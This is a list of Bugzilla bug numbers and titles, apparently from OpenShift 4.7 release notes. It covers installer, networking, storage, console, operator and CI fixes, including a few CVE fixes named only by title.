1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster
1887525 - Failures to set master HardwareDetails cannot easily be debugged
1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable
1887585 - ovn-masters stuck in crashloop after scale test
1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade.
1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator
1887740 - cannot install descheduler operator after uninstalling it
1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events
1887750 - `oc explain localvolumediscovery` returns empty description
1887751 - `oc explain localvolumediscoveryresult` returns empty description
1887778 - Add ContainerRuntimeConfig gatherer
1887783 - PVC upload cannot continue after approve the certificate
1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard
1887799 - User workload monitoring prometheus-config-reloader OOM
1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky
1887863 - Installer panics on invalid flavor
1887864 - Clean up dependencies to avoid invalid scan flagging
1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison
1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig
1888015 - workaround kubelet graceful termination of static pods bug
1888028 - prevent extra cycle in aggregated apiservers
1888036 - Operator details shows old CRD versions
1888041 - non-terminating pods are going from running to pending
1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect
1888073 - Operator controller continuously busy looping
1888118 - Memory requests not specified for image registry operator
1888150 - Install Operand Form on OperatorHub is displaying unformatted text
1888172 - PR 209 didn't update the sample archive, but machineset and pdbs are now namespaced
1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build
1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5
1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt
1888363 - namespaces crash in dev
1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created
1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected
1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC
1888494 - imagepruner pod is error when image registry storage is not configured
1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree"
1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error
1888601 - The poddisruptionbudgets is using the operator service account, instead of gather
1888657 - oc doesn't know its name
1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable
1888671 - Document the Cloud Provider's ignore-volume-az setting
1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image
1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName()
1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set
1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster
1888866 - AggregatedAPIDown permanently firing after removing APIService
1888870 - JS error when using autocomplete in YAML editor
1888874 - hover message are not shown for some properties
1888900 - align plugins versions
1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation
1889213 - The error message of uploading failure is not clear enough
1889267 - Increase the time out for creating template and upload image in the terraform
1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)
1889374 - Kiali feature won't work on fresh 4.6 cluster
1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode
1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade
1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information
1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance
1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown
1889577 - Resources are not shown on project workloads page
1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment
1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages
1889692 - Selected Capacity is showing wrong size
1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15
1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off
1889710 - Prometheus metrics on disk take more space compared to OCP 4.5
1889721 - opm index add semver-skippatch mode does not respect prerelease versions
1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab
1889767 - [vsphere] Remove certificate from upi-installer image
1889779 - error when destroying a vSphere installation that failed early
1889787 - OCP is flooding the oVirt engine with auth errors
1889838 - race in Operator update after fix from bz1888073
1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1
1889863 - Router prints incorrect log message for namespace label selector
1889891 - Backport timecache LRU fix
1889912 - Drains can cause high CPU usage
1889921 - Reported Degraded=False Available=False pair does not make sense
1889928 - [e2e][automation] Add more tests for golden os
1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName
1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings
1890074 - MCO extension kernel-headers is invalid
1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest
1890130 - multitenant mode consistently fails CI
1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e
1890145 - The mismatched of font size for Status Ready and Health Check secondary text
1890180 - FieldDependency x-descriptor doesn't support non-sibling fields
1890182 - DaemonSet with existing owner garbage collected
1890228 - AWS: destroy stuck on route53 hosted zone not found
1890235 - e2e: update Protractor's checkErrors logging
1890250 - workers may fail to join the cluster during an update from 4.5
1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member
1890270 - External IP doesn't work if the IP address is not assigned to a node
1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability
1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere
1890467 - unable to edit an application without a service
1890472 - [Kuryr] Bulk port creation exception not completely formatted
1890494 - Error assigning Egress IP on GCP
1890530 - cluster-policy-controller doesn't gracefully terminate
1890630 - [Kuryr] Available port count not correctly calculated for alerts
1890671 - [SA] verify-image-signature using service account does not work
1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest
1890808 - New etcd alerts need to be added to the monitoring stack
1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha.
1890984 - Rename operator-webhook-config to sriov-operator-webhook-config
1890995 - wew-app should provide more insight into why image deployment failed
1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call
1891047 - Helm chart fails to install using developer console because of TLS certificate error
1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler
1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI
1891108 - p&f: Increase the concurrency share of workload-low priority level
1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)
1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown
1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart)
1891362 - Wrong metrics count for openshift_build_result_total
1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message
1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message
1891376 - Extra text in Cluster Utilization charts
1891419 - Wrong detail head on network policy detail page.
1891459 - Snapshot tests should report stderr of failed commands
1891498 - Other machine config pools do not show during update
1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage
1891551 - Clusterautoscaler doesn't scale up as expected
1891552 - Handle missing labels as empty.
1891555 - The windows oc.exe binary does not have version metadata
1891559 - kuryr-cni cannot start new thread
1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11
1891625 - [Release 4.7] Mutable LoadBalancer Scope
1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml
1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails
1891740 - OperatorStatusChanged is noisy
1891758 - the authentication operator may spam DeploymentUpdated event endlessly
1891759 - Dockerfile builds cannot change /etc/pki/ca-trust
1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1
1891825 - Error message not very informative in case of mode mismatch
1891898 - The ClusterServiceVersion can define Webhooks that cannot be created.
1891951 - UI should show warning while creating pools with compression on
1891952 - [Release 4.7] Apps Domain Enhancement
1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace
1891995 - OperatorHub displaying old content
1891999 - Storage efficiency card showing wrong compression ratio
1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28' not found (required by ./opm)
1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector.
1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator'
1892288 - assisted install workflow creates excessive control-plane disruption
1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config
1892358 - [e2e][automation] update feature gate for kubevirt-gating job
1892376 - Deleted netnamespace could not be re-created
1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky
1892393 - TestListPackages is flaky
1892448 - MCDPivotError alert/metric missing
1892457 - NTO-shipped stalld needs to use FIFO for boosting.
1892467 - linuxptp-daemon crash
1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env
1892653 - User is unable to create KafkaSource with v1beta
1892724 - VFS added to the list of devices of the nodeptpdevice CRD
1892799 - Mounting additionalTrustBundle in the operator
1893117 - Maintenance mode on vSphere blocks installation.
1893351 - TLS secrets are not able to edit on console.
1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots
1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability
1893546 - Deploy using virtual media fails on node cleaning step
1893601 - overview filesystem utilization of OCP is showing the wrong values
1893645 - oc describe route SIGSEGV
1893648 - Ironic image building process is not compatible with UEFI secure boot
1893724 - OperatorHub generates incorrect RBAC
1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted
1893776 - No useful metrics for image pull time available, making debugging issues there impossible
1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator
1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD
1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS
1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped
1893944 - Wrong product name for Multicloud Object Gateway
1893953 - (release-4.7) Gather default StatefulSet configs
1893956 - Installation always fails at "failed to initialize the cluster: Cluster operator image-registry is still updating"
1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser
1893972 - Should skip e2e test cases as early as possible
1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://'
1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective
1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set
1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used.
1894065 - tag new packages to enable TLS support
1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0
1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries
1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM
1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted
1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)
1894216 - Improve OpenShift Web Console availability
1894275 - Fix CRO owners file to reflect node owner
1894278 - "database is locked" error when adding bundle to index image
1894330 - upgrade channels needs to be updated for 4.7
1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient"
1894374 - Dont prevent the user from uploading a file with incorrect extension
1894432 - [oVirt] sometimes installer timeout on tmp_import_vm
1894477 - bash syntax error in nodeip-configuration.service
1894503 - add automated test for Polarion CNV-5045
1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform
1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets
1894645 - Cinder volume provisioning crashes on nil cloud provider
1894677 - image-pruner job is panicking: klog stack
1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0
1894860 - 'backend' CI job passing despite failing tests
1894910 - Update the node to use the real-time kernel fails
1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package
1895065 - Schema / Samples / Snippets Tabs are all selected at the same time
1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI
1895141 - panic in service-ca injector
1895147 - Remove memory limits on openshift-dns
1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation
1895268 - The bundleAPIs should NOT be empty
1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster
1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release"
1895360 - Machine Config Daemon removes a file although its defined in the dropin
1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1
1895372 - Web console going blank after selecting any operator to install from OperatorHub
1895385 - Revert KUBELET_LOG_LEVEL back to level 3
1895423 - unable to edit an application with a custom builder image
1895430 - unable to edit custom template application
1895509 - Backup taken on one master cannot be restored on other masters
1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image
1895838 - oc explain description contains '/'
1895908 - "virtio" option is not available when modifying a CD-ROM to disk type
1895909 - e2e-metal-ipi-ovn-dualstack is failing
1895919 - NTO fails to load kernel modules
1895959 - configuring webhook token authentication should prevent cluster upgrades
1895979 - Unable to get coreos-installer with --copy-network to work
1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV
1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)
1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed
1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest
1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded
1896244 - Found a panic in storage e2e test
1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general
1896302 - [e2e][automation] Fix 4.6 test failures
1896365 - [Migration]The SDN migration cannot revert under some conditions
1896384 - [ovirt IPI]: local coredns resolution not working
1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6
1896529 - Incorrect instructions in the Serverless operator and application quick starts
1896645 - documentationBaseURL needs to be updated for 4.7
1896697 - [Descheduler] policy.yaml param in cluster configmap is empty
1896704 - Machine API components should honour cluster wide proxy settings
1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters
1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator
1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails
1896918 - start creating new-style Secrets for AWS
1896923 - DNS pod /metrics exposed on anonymous http port
1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1897003 - VNC console cannot be connected after visit it in new window
1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals
1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO
1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored
1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV.
1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces
1897138 - oVirt provider uses depricated cluster-api project
1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly
1897252 - Firing alerts are not showing up in console UI after cluster is up for some time
1897354 - Operator installation showing success, but Provided APIs are missing
1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused"
1897412 - [sriov]disableDrain did not be updated in CRD of manifest
1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page
1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost'
1897520 - After restarting nodes the image-registry co is in degraded true state.
1897584 - Add casc plugins
1897603 - Cinder volume attachment detection failure in Kubelet
1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized"
1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests
1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition
1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`
1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing
1897897 - ptp lose sync openshift 4.6
1898036 - no network after reboot (IPI)
1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically
1898097 - mDNS floods the baremetal network
1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem
1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied
1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster
1898174 - [OVN] EgressIP does not guard against node IP assignment
1898194 - GCP: can't install on custom machine types
1898238 - Installer validations allow same floating IP for API and Ingress
1898268 - [OVN]: `make check` broken on 4.6
1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default
1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover
1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display.
1898407 - [Deployment timing regression] Deployment takes longer with 4.7
1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service
1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine
1898500 - Failure to upgrade operator when a Service is included in a Bundle
1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic
1898532 - Display names defined in specDescriptors not respected
1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted
1898613 - Whereabouts should exclude IPv6 ranges
1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase
1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk
1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability
1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator
1898839 - Wrong YAML in operator metadata
1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job
1898873 - Remove TechPreview Badge from Monitoring
1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way
1899111 - [RFE] Update jenkins-maven-agen to maven36
1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist
1899175 - bump the RHCOS boot images for 4.7
1899198 - Use new packages for ipa ramdisks
1899200 - In Installed Operators page I cannot search for an Operator by it's name
1899220 - Support AWS IMDSv2
1899350 - configure-ovs.sh doesn't configure bonding options
1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found"
1899459 - Failed to start monitoring pods once the operator removed from override list of CVO
1899515 - Passthrough credentials are not immediately re-distributed on update
1899575 - update discovery burst to reflect lots of CRDs on openshift clusters
1899582 - update discovery burst to reflect lots of CRDs on openshift clusters
1899588 - Operator objects are re-created after all other associated resources have been deleted
1899600 - Increased etcd fsync latency as of OCP 4.6
1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup
1899627 - Project dashboard Active status using small icon
1899725 - Pods table does not wrap well with quick start sidebar open
1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)
1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality
1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0"
1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap
1899853 - additionalSecurityGroupIDs not working for master nodes
1899922 - NP changes sometimes influence new pods.
1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet
1900008 - Fix internationalized sentence fragments in ImageSearch.tsx
1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx
1900020 - Remove ' from internationalized keys
1900022 - Search Page - Top labels field is not applied to selected Pipeline resources
1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently
1900126 - Creating a VM results in suggestion to create a default storage class when one already exists
1900138 - [OCP on RHV] Remove insecure mode from the installer
1900196 - stalld is not restarted after crash
1900239 - Skip "subPath should be able to unmount" NFS test
1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists
1900377 - [e2e][automation] create new css selector for active users
1900496 - (release-4.7) Collect spec config for clusteroperator resources
1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks
1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue
1900759 - include qemu-guest-agent by default
1900790 - Track all resource counts via telemetry
1900835 - Multus errors when cachefile is not found
1900935 - `oc adm release mirror` panic panic: runtime error
1900989 - accessing the route cannot wake up the idled resources
1901040 - When scaling down the status of the node is stuck on deleting
1901057 - authentication operator health check failed when installing a cluster behind proxy
1901107 - pod donut shows incorrect information
1901111 - Installer dependencies are broken
1901200 - linuxptp-daemon crash when enable debug log level
1901301 - CBO should handle platform=BM without provisioning CR
1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly
1901363 - High Podready Latency due to timed out waiting for annotations
1901373 - redundant bracket on snapshot restore button
1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true"
1901395 - "Edit virtual machine template" action link should be removed
1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting
1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP
1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema
1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance"
1901604 - CNO blocks editing Kuryr options
1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled
1901909 - The device plugin pods / cni pod are restarted every 5 minutes
1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service
1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error
1902059 - Wire a real signer for service accout issuer
1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod
1902253 - MHC status doesnt set RemediationsAllowed = 0
1902299 - Failed to mirror operator catalog - error: destination registry required
1902545 - Cinder csi driver node pod should add nodeSelector for Linux
1902546 - Cinder csi driver node pod doesn't run on master node
1902547 - Cinder csi driver controller pod doesn't run on master node
1902552 - Cinder csi driver does not use the downstream images
1902595 - Project workloads list view doesn't show alert icon and hover message
1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent
1902601 - Cinder csi driver pods run as BestEffort qosClass
1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group
1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails
1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked
1902824 - failed to generate semver informed package manifest: unable to determine default channel
1902894 - hybrid-overlay-node crashing trying to get node object during initialization
1902969 - Cannot load vmi detail page
1902981 - It should default to current namespace when create vm from template
1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI
1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry
1903034 - OLM continuously printing debug logs
1903062 - [Cinder csi driver] Deployment mounted volume have no write access
1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready
1903107 - Enable vsphere-problem-detector e2e tests
1903164 - OpenShift YAML editor jumps to top every few seconds
1903165 - Improve Canary Status Condition handling for e2e tests
1903172 - Column Management: Fix sticky footer on scroll
1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled
1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format:
1903192 - Role name missing on create role binding form
1903196 - Popover positioning is misaligned for Overview Dashboard status items
1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends.
1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components
1903248 - Backport Upstream Static Pod UID patch
1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]
1903290 - Kubelet repeatedly log the same log line from exited containers
1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption.
1903382 - Panic when task-graph is canceled with a TaskNode with no tasks
1903400 - Migrate a VM which is not running goes to pending state
1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page
1903414 - NodePort is not working when configuring an egress IP address
1903424 - mapi_machine_phase_transition_seconds_sum doesn't work
1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum"
1903639 - Hostsubnet gatherer produces wrong output
1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service
1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started
1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image
1903717 - Handle different Pod selectors for metal3 Deployment
1903733 - Scale up followed by scale down can delete all running workers
1903917 - Failed to load "Developer Catalog" page
1903999 - Httplog response code is always zero
1904026 - The quota controllers should resync on new resources and make progress
1904064 - Automated cleaning is disabled by default
1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases
1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap
1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails
1904133 - KubeletConfig flooded with failure conditions
1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart
1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !
1904244 - MissingKey errors for two plugins using i18next.t
1904262 - clusterresourceoverride-operator has version: 1.0.0 every build
1904296 - VPA-operator has version: 1.0.0 every build
1904297 - The index image generated by "opm index prune" leaves unrelated images
1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards
1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade
1904497 - vsphere-problem-detector: Run on vSphere cloud only
1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set
1904502 - vsphere-problem-detector: allow longer timeouts for some operations
1904503 - vsphere-problem-detector: emit alerts
1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)
1904578 - metric scraping for vsphere problem detector is not configured
1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade
1904663 - IPI pointer customization MachineConfig always generated
1904679 - [Feature:ImageInfo] Image info should display information about images
1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image
1904684 - [sig-cli] oc debug ensure it works with image streams
1904713 - Helm charts with kubeVersion restriction are filtered incorrectly
1904776 - Snapshot modal alert is not pluralized
1904824 - Set vSphere hostname from guestinfo before NM starts
1904941 - Insights status is always showing a loading icon
1904973 - KeyError: 'nodeName' on NP deletion
1904985 - Prometheus and thanos sidecar targets are down
1904993 - Many ampersand special characters are found in strings
1905066 - QE - Monitoring test cases - smoke test suite automation
1905074 - QE -Gherkin linter to maintain standards
1905100 - Too many haproxy processes in default-router pod causing high load average
1905104 - Snapshot modal disk items missing keys
1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm
1905119 - Race in AWS EBS determining whether custom CA bundle is used
1905128 - [e2e][automation] e2e tests succeed without actually execute
1905133 - operator conditions special-resource-operator
1905141 - vsphere-problem-detector: report metrics through telemetry
1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures
1905194 - Detecting broken connections to the Kube API takes up to 15 minutes
1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests
1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP
1905253 - Inaccurate text at bottom of Events page
1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905299 - OLM fails to update operator
1905307 - Provisioning CR is missing from must-gather
1905319 - cluster-samples-operator containers are not requesting required memory resource
1905320 - csi-snapshot-webhook is not requesting required memory resource
1905323 - dns-operator is not requesting required memory resource
1905324 - ingress-operator is not requesting required memory resource
1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory
1905328 - Changing the bound token service account issuer invalids previously issued bound tokens
1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory
1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails
1905347 - QE - Design Gherkin Scenarios
1905348 - QE - Design Gherkin Scenarios
1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod
1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted
1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input
